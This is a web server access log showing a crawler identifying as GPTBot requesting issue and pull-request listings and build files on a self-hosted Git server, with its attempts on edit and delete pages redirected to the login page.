git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 14153] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:19:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11336] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:19:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt?display=source" [Client 74.7.227.38] [Length 14171] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 9817] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 6985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 13970] [Gzip 6.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:19:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:42:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/warn-gold_monitor_full.txt" -[17/Feb/2026:19:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:19:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11380] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11377] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:43:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:19:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr 